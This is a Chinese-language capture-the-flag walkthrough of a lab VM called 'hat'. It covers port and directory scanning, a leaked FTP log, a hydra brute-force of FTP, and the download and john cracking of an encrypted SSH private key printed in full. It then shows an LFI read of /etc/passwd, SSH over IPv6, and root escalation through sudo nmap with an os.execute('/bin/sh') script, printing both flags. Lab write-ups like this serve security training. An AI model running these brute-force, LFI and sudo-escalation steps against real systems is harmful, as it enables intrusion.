信息收集

服务探测

❯ sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       VMware, Inc.
192.168.60.2    00:50:56:e3:f6:57       VMware, Inc.
192.168.60.209  08:00:27:7d:13:98       PCS Systemtechnik GmbH
192.168.60.254  00:50:56:e5:e5:eb       VMware, Inc.

13 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.064 seconds (124.03 hosts/sec). 4 responded
❯ export ip=192.168.60.209
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
I don't always scan ports, but when I do, I prefer RustScan.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.209:80
Open 192.168.60.209:65535
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-26 13:34 CST
Initiating ARP Ping Scan at 13:34
Scanning 192.168.60.209 [1 port]
Completed ARP Ping Scan at 13:34, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 13:34
Completed Parallel DNS resolution of 1 host. at 13:34, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 13:34
Scanning 192.168.60.209 [2 ports]
Discovered open port 65535/tcp on 192.168.60.209
Discovered open port 80/tcp on 192.168.60.209
Completed SYN Stealth Scan at 13:34, 0.03s elapsed (2 total ports)
Nmap scan report for 192.168.60.209
Host is up, received arp-response (0.00034s latency).
Scanned at 2025-02-26 13:34:18 CST for 0s

PORT      STATE SERVICE REASON
80/tcp    open  http    syn-ack ttl 64
65535/tcp open  unknown syn-ack ttl 64
MAC Address: 08:00:27:7D:13:98 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.29 seconds
           Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

没有开放22端口，有个65535端口

先扫一下80端口的目录

❯ gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,zip,txt -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.209
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   403,404
[+] User Agent:              gobuster/3.6
[+] Extensions:              html,zip,txt,php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 10701]
/logs                 (Status: 301) [Size: 315] [--> http://192.168.60.209/logs/]
/php-scripts          (Status: 301) [Size: 322] [--> http://192.168.60.209/php-scripts/]
Progress: 1038215 / 1038220 (100.00%)
===============================================================
Finished
===============================================================

日志泄露

利用nc连接一下65535端口

发现采用了pyftpdlib

❯ nc -vn $ip 65535
(UNKNOWN) [192.168.60.209] 65535 (?) open
220 pyftpdlib 1.5.4 ready.

pyftpdlib 是一个用 Python 编写的高性能、可扩展的 FTP 服务器库。它允许你在 Python 程序中轻松地构建和定制 FTP 服务器

那就用ftp连接一下，发现不允许匿名登录

❯ ftp anonymous@$ip 65535
Connected to 192.168.60.209.
220 pyftpdlib 1.5.4 ready.
331 Username ok, send password.
Password:
530 Anonymous access not allowed.
ftp: Login failed
ftp> exit
221 Goodbye.

我们尝试在logs下添加后缀

再次扫一下目录，发现存在/vsftpd.log

❯ gobuster dir -u http://$ip/logs -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,zip,txt,log -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.209/logs
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   403,404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html,zip,txt,log
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 4]
/vsftpd.log           (Status: 200) [Size: 1760]
Progress: 1245858 / 1245864 (100.00%)
===============================================================
Finished
===============================================================

尝试curl一下此日志

发现日志中admin_ftp用户登录成功

❯ curl http://192.168.60.209/logs/vsftpd.log

[I 2021-09-28 18:43:57] >>> starting FTP server on 0.0.0.0:21, pid=475 <<<
[I 2021-09-28 18:43:57] concurrency model: async
[I 2021-09-28 18:43:57] masquerade (NAT) address: None
[I 2021-09-28 18:43:57] passive ports: None
[I 2021-09-28 18:44:02] 192.168.1.83:49268-[] FTP session opened (connect)
[I 2021-09-28 18:44:06] 192.168.1.83:49280-[] USER 'l4nr3n' failed login.
[I 2021-09-28 18:44:06] 192.168.1.83:49290-[] USER 'softyhack' failed login.
[I 2021-09-28 18:44:06] 192.168.1.83:49292-[] USER 'h4ckb1tu5' failed login.
[I 2021-09-28 18:44:06] 192.168.1.83:49272-[] USER 'noname' failed login.
[I 2021-09-28 18:44:06] 192.168.1.83:49278-[] USER 'cromiphi' failed login.
[I 2021-09-28 18:44:06] 192.168.1.83:49284-[] USER 'b4el7d' failed login.
[I 2021-09-28 18:44:06] 192.168.1.83:49270-[] USER 'shelldredd' failed login.
[I 2021-09-28 18:44:06] 192.168.1.83:49270-[] USER 'anonymous' failed login.
[I 2021-09-28 18:44:09] 192.168.1.83:49292-[] USER 'alienum' failed login.
[I 2021-09-28 18:44:09] 192.168.1.83:49280-[] USER 'k1m3r4' failed login.
[I 2021-09-28 18:44:09] 192.168.1.83:49284-[] USER 'tatayoyo' failed login.
[I 2021-09-28 18:44:09] 192.168.1.83:49278-[] USER 'Exploiter' failed login.
[I 2021-09-28 18:44:09] 192.168.1.83:49268-[] USER 'tasiyanci' failed login.
[I 2021-09-28 18:44:09] 192.168.1.83:49274-[] USER 'luken' failed login.
[I 2021-09-28 18:44:09] 192.168.1.83:49270-[] USER 'ch4rm' failed login.
[I 2021-09-28 18:44:09] 192.168.1.83:49282-[] FTP session closed (disconnect).
[I 2021-09-28 18:44:09] 192.168.1.83:49280-[admin_ftp] USER 'admin_ftp' logged in.
[I 2021-09-28 18:44:09] 192.168.1.83:49280-[admin_ftp] FTP session closed (disconnect).
[I 2021-09-28 18:44:12] 192.168.1.83:49272-[] FTP session closed (disconnect).

Ftp爆破

利用hydra爆破一下ftp

得到密码cowboy

❯ hydra -l admin_ftp -P /usr/share/wordlists/rockyou.txt ftp://$ip -s 65535 -I
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-26 14:11:34
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ftp://192.168.60.209:65535/
[STATUS] 288.00 tries/min, 288 tries in 00:01h, 14344111 to do in 830:06h, 16 active
[STATUS] 289.00 tries/min, 867 tries in 00:03h, 14343532 to do in 827:12h, 16 active
[65535][ftp] host: 192.168.60.209   login: admin_ftp   password: cowboy
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-02-26 14:15:44

连接一下，发现存在私钥文件和一个提示

❯ ftp admin_ftp@$ip 65535
Connected to 192.168.60.209.
220 pyftpdlib 1.5.4 ready.
331 Username ok, send password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering extended passive mode (|||53381|).
150 File status okay. About to open data connection.
drwxrwxrwx   2 cromiphi cromiphi     4096 Sep 28  2021 share
226 Transfer complete.
ftp> cd share
250 "/share" is the current directory.
ftp> ls
229 Entering extended passive mode (|||34087|).
150 File status okay. About to open data connection.
-rwxrwxrwx   1 cromiphi cromiphi     1751 Sep 28  2021 id_rsa
-rwxrwxrwx   1 cromiphi cromiphi      108 Sep 28  2021 note
226 Transfer complete.
ftp> get id_rsa
local: id_rsa remote: id_rsa
229 Entering extended passive mode (|||55203|).
150 File status okay. About to open data connection.
100% |*********************************************************************************************************|  1751      545.44 KiB/s    00:00 ETA
226 Transfer complete.
1751 bytes received in 00:00 (395.36 KiB/s)
ftp> get note
local: note remote: note
229 Entering extended passive mode (|||58885|).
150 File status okay. About to open data connection.
100% |*********************************************************************************************************|   108       54.08 KiB/s    00:00 ETA
226 Transfer complete.
108 bytes received in 00:00 (26.06 KiB/s)
ftp> exit
221 Goodbye.

但问题是22端口不开放啊，没法通过私钥进行连接

❯ cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,6F30B7B22B088AB2

JmLJqI4m9jk1McrIzNFyuYrPyPu3Znw6awuyEIK0ZctgYabjNk5MVCM0FH45SQCl
rqK3QqSACiOq4+DnMWrECj5CO+JPzGjIupgz8IrW0Cr7mkRSNa9fCeEBrIzAi924
GEM72PMuwlBM4zWDZ/962gtZpDnzXYLc9mYdVTe+ubI2NrVC6d2ak1L5GMsBdYwi
BVj8bhnUsr4doXi1ZcRAZoHUses/Z8ohfNXkUoDO2d1kQmiE0hAVEUnBerzV+E84
GpJFBgHphboG9E+R3Gh27viM3pY0qFvU/PWbTJ8Y6LgSgJPMLldlEuBEym0LPDpc
27L7wdKEYwCjPWBGtuGnKsdfleQfsyKijH8/YDlH0hsrDc83ZMcDR13jtfZbZjHZ
IwVdhUuKdHp6Ig4lmxi1RqJA35CD6ZHHMzOKlm1TjQskA0j6jdPeJ3o5ebh/z3oe
tr3FKEawz+2KQa+CX+frCwN/rLFUc8MOvh7I4/jJ9o2kdKB0u5OHH+pgXfmhTJzl
mVSqOtti7cxefUb142Jltku5kElwKdvVEHw+qmZNMwrw+Kv7rlpvezfsW4uzm8Je
nlmxXoMl62Z3FKPjKarEqZrbO6bHf6lWAIrJgJGydRn1tpD/IY1DJZKwa0aLrkbr
7hu8C0LSpIVdy5ZUSaT04ZL/FBxDQR7cg2/ZYF5Kc1pvIgjXrlEsbbSPDyg2bLIW
eCMRnevvsTS8l55qUvQ2GO73kHMcWfkAsvUaojLiSxXGTcd+gPf6kXiwTbz2wbTR
KPzDwKaTn74yW+9jc88+6D8CdT6OrN+2eP8K0ukdNwMqVc+Mag0TOOCwq+QVfKwf
O7A+3+13xjUy1/TKRIJDXuhL88RDrzA7U4uy9ZDYEq5z2HVc3agqnHMBP4k2n0KE
u2YoCNOp52Q4YpKoXoz5Ojw8CuUIhNqoilh/0j+gkdgIO5jMAEBT7p6M/fnhfHpe
VNCimSJfTjLCU49Tez0HeDDCuE4oG/vShjM0ebZHMMWTY8vVOaRz4Ktcx938Jpnj
/j9Z0NEAEUI2ISZGGDLS/O0fhyN9lsl1UrY2yR3NnXgbX3YkjWLDM4C8mWSCejpl
XhWSUYlt8X83atlUfTcn97QVGeJXvlJhBUrYEtsTHjDc2lsH3KQNYtpckQizpcyW
axJjIeWhI+eqWIVwsXTxKI2hIa6XuYdjUP7cusDad+pUo1Y7h0wTwLP1KYtkXrm3
sEvB8X2mX6tHB+1iO67UKjFdZ7Ti1Q2XY6zCCbOl3S5b24MFAFANDYgkr1QtgQqs
j+tSrrd1yOn4AeM6SdyLdVxKQBY2s0+9dvLmaJLH9OOdV0G4I4WcMuum40WMzXrf
fBAMIh7Gl0lEWPOrPtOxrQI++kAlyzNTK1oxSvdc/f30TOB4hGH8yU3EKzRh/QTa
fHkcKP9V7Y0xKwrg2yLuWsFSt4QnFUZEbV+wDq2i9NqvriYOxSa2qarPP04FVZRp
5xYdSGWdMuPFTEAaM+67wR33zzlYKvnEmE9CRHnAqVpqHFuNmgYD+S3KhzW3X1A3
zlflWacIB06p/cXCr3w6XNqa0y2TsNmuT2IR6JX+Qr6usNV4QWL/Jyyy4dE1oBG6
-----END RSA PRIVATE KEY-----
❯ cat note

Hi,

We have successfully secured some of our most critical protocols ... no more worrying!
我们已成功确保了一些最关键的协议...不再担心！



Sysadmin

用户提权

不过我发现在ipv6中ssh端口是开放的

❯ ping6 -I eth0 -c 5 ff02::1
ping6: Warning: source address might be selected on device other than: eth0
PING ff02::1 (ff02::1) from :: eth0: 56 data bytes
64 bytes from fe80::5cbb:f6ff:fe9e:eefa%eth0: icmp_seq=1 ttl=64 time=0.185 ms
64 bytes from fe80::250:56ff:fec0:2222%eth0: icmp_seq=1 ttl=1 time=0.284 ms
64 bytes from fe80::a00:27ff:fe7d:1398%eth0: icmp_seq=1 ttl=64 time=1.47 ms
64 bytes from fe80::5cbb:f6ff:fe9e:eefa%eth0: icmp_seq=2 ttl=64 time=0.023 ms
64 bytes from fe80::250:56ff:fec0:2222%eth0: icmp_seq=2 ttl=1 time=0.277 ms
64 bytes from fe80::a00:27ff:fe7d:1398%eth0: icmp_seq=2 ttl=64 time=0.554 ms
64 bytes from fe80::5cbb:f6ff:fe9e:eefa%eth0: icmp_seq=3 ttl=64 time=0.025 ms
64 bytes from fe80::250:56ff:fec0:2222%eth0: icmp_seq=3 ttl=1 time=0.363 ms
64 bytes from fe80::a00:27ff:fe7d:1398%eth0: icmp_seq=3 ttl=64 time=1.22 ms
^C
--- ff02::1 ping statistics ---
3 packets transmitted, 3 received, +6 duplicates, 0% packet loss, time 2052ms
rtt min/avg/max/mdev = 0.023/0.488/1.466/0.484 ms
❯ nmap -6 fe80::a00:27ff:fe7d:1398
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-26 15:16 CST
Nmap scan report for fe80::a00:27ff:fe7d:1398
Host is up (0.0025s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:7D:13:98 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.34 seconds

不过不知道用户名，尝试爆破私钥得到 ilovemyself

❯ ssh2john id_rsa >hash
❯ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
ilovemyself      (id_rsa)
1g 0:00:00:00 DONE (2025-02-26 15:13) 50.00g/s 80000p/s 80000c/s 80000C/s joyce..dragon1
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

LFI漏洞

我们再次扫描一下/php-scripts目录

得到一个file.php

❯ gobuster dir -u http://$ip/php-scripts -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,zip,txt,log -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.209/php-scripts
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   403,404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html,zip,txt,log
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 7]
/file.php             (Status: 200) [Size: 0]
Progress: 12481 / 1245864 (1.00%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 12552 / 1245864 (1.01%)
===============================================================
Finished
===============================================================

猜测存在LFI漏洞

模糊测试一下，得到参数6

❯ wfuzz -c -u "http://$ip/php-scripts/file.php?FUZZ=/etc/passwd" -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt --hw 0 --hc 404
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.60.209/php-scripts/file.php?FUZZ=/etc/passwd
Total requests: 26584

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000001358:   200        26 L     38 W       1404 Ch     "6"
 /usr/lib/python3/dist-packages/wfuzz/wfuzz.py:80: UserWarning:Finishing pending requests...

Total time: 9.368297
Processed Requests: 13405
Filtered Requests: 13404
Requests/sec.: 1430.889

获取到用户名cromiphi

❯ curl http://192.168.60.209//php-scripts/file.php\?6\=/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
cromiphi:x:1000:1000:cromiphi,,,:/home/cromiphi:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin

尝试ssh 进行ipv6连接

成功登录

先拿个user

❯ ssh cromiphi@fe80::a00:27ff:fe7d:1398%eth0 -i id_rsa
Enter passphrase for key 'id_rsa':
Linux hat 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
cromiphi@hat:~$ cat user.txt
d3ea66f59d9d6ea12351b415080b5457
cromiphi@hat:~$ sudo -l
Matching Defaults entries for cromiphi on hat:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User cromiphi may run the following commands on hat:
    (root) NOPASSWD: /usr/bin/nmap

Root提权

发现用户拥有sudo权限可以执行nmap

尝试利用--interactive参数启用交互界面

1
2
3

cromiphi@hat:~$ sudo /usr/bin/nmap --interactive
/usr/bin/nmap: unrecognized option '--interactive'
See the output of nmap -h for a summary of options.

不过好像没有这个选项

但还可以利用--script执行脚本

虽然说输入没有回显，但是可以成功执行

cromiphi@hat:~$ echo 'os.execute("/bin/sh")'>aaa
cromiphi@hat:~$ sudo /usr/bin/nmap --script aaa
Starting Nmap 7.70 ( https://nmap.org ) at 2025-02-26 08:35 CET
NSE: Warning: Loading 'aaa' -- the recommended file extension is '.nse'.
# uid=0(root) gid=0(root) grupos=0(root)
# 8b4acc39c4d068623a16a89ebecd5048
# # NSE: failed to initialize the script engine:
/usr/bin/../share/nmap/nse_main.lua:626: aaa is missing required field: 'action'
stack traceback:
        [C]: in function 'error'
        /usr/bin/../share/nmap/nse_main.lua:626: in field 'new'
        /usr/bin/../share/nmap/nse_main.lua:828: in local 'get_chosen_scripts'
        /usr/bin/../share/nmap/nse_main.lua:1315: in main chunk
        [C]: in ?

QUITTING!
cromiphi@hat:~$ bash -p
bash-5.0# whoami
root
bash-5.0# cat /root/root.txt
8b4acc39c4d068623a16a89ebecd5048